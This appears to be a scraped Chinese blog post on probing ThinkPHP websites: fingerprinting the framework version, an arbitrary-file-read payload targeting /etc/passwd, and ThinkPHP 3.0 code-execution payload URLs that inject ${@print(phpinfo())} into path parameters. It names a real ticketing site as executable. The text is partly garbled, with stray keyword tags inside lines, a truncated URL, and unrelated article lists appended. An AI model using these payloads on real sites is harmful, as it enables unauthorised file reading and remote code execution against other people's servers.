Thinkphp 漏洞小試
首先肯定這個網站使用thinkphp的框架 php
國內不少php開源項目的代碼都是使用thinkphp框架編寫的,可是thinkphp框架有不少版本,如何才能知道咱們使用的框架是哪一個版本的呢? html
在URL後面加thinkphp的目錄,也有可能爆出來 web
這是一個tankphp的網站目錄。供參考 thinkphp
-
admin是後臺工程文件夾
-
home是前臺工程
-
public裏面用於存放CSS文件,JS文件以及網頁裏面的圖片
-
ThinkPHP框架
-
ueditor是百度編輯器
ThinkPHP的Ubb標籤漏洞讀取任意內容
localhost/index/?path=[code]/etc/passwd[/code] shell
附圖 php框架
hinkphp 3.0 爆路徑漏洞
1. thinkphp3.0 模塊加載失敗,出錯信息爆應用程序路徑。 安全
檢測有兩種狀況 app
1. 可執行命令,這個估計是僞3.0版本? 框架
交大定票 編輯器
此站到能夠執行命令
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
可查看版本
http://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D
可查看phpinfo信息
2. 不可執行命令,爆路徑
http://webshell.cc/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7
http://webshell.cc/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D
- 1. thinkphp歷史漏洞
- 2. ThinkPHP漏洞總結
- 3. thinkphp漏洞集合
- 4. ThinkPHP 漏洞檢測
- 5. ThinkPHP框架漏洞
- 6. ThinkPHP 3.0~3.2 注入漏洞
- 7. ThinkPHP V5 漏洞利用
- 8. thinkPHP命令執行漏洞
- 9. ThinkPHP-漏洞分析集合
- 10. 網站漏洞怎麼修復對於thinkphp的漏洞修復
- 更多相關文章...
- • Lua 調試(Debug) - Lua 教程
- • Eclipse Debug 調試 - Eclipse 教程
- • 爲了進字節跳動,我精選了29道Java經典算法題,帶詳細講解
- • 三篇文章瞭解 TiDB 技術內幕——說存儲
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 跳槽面試的幾個實用小技巧,不妨看看!
- 2. Mac實用技巧 |如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 3. Mac實用技巧 |如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 4. 如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 5. Mac OS非兼容Windows軟件運行解決方案——「以VMware & Microsoft Access爲例「
- 6. 封裝 pyinstaller -F -i b.ico excel.py
- 7. 數據庫作業三ER圖待完善
- 8. nvm安裝使用低版本node.js(非命令安裝)
- 9. 如何快速轉換圖片格式
- 10. 將表格內容分條轉換爲若干文檔
- 1. thinkphp歷史漏洞
- 2. ThinkPHP漏洞總結
- 3. thinkphp漏洞集合
- 4. ThinkPHP 漏洞檢測
- 5. ThinkPHP框架漏洞
- 6. ThinkPHP 3.0~3.2 注入漏洞
- 7. ThinkPHP V5 漏洞利用
- 8. thinkPHP命令執行漏洞
- 9. ThinkPHP-漏洞分析集合
- 10. 網站漏洞怎麼修復對於thinkphp的漏洞修復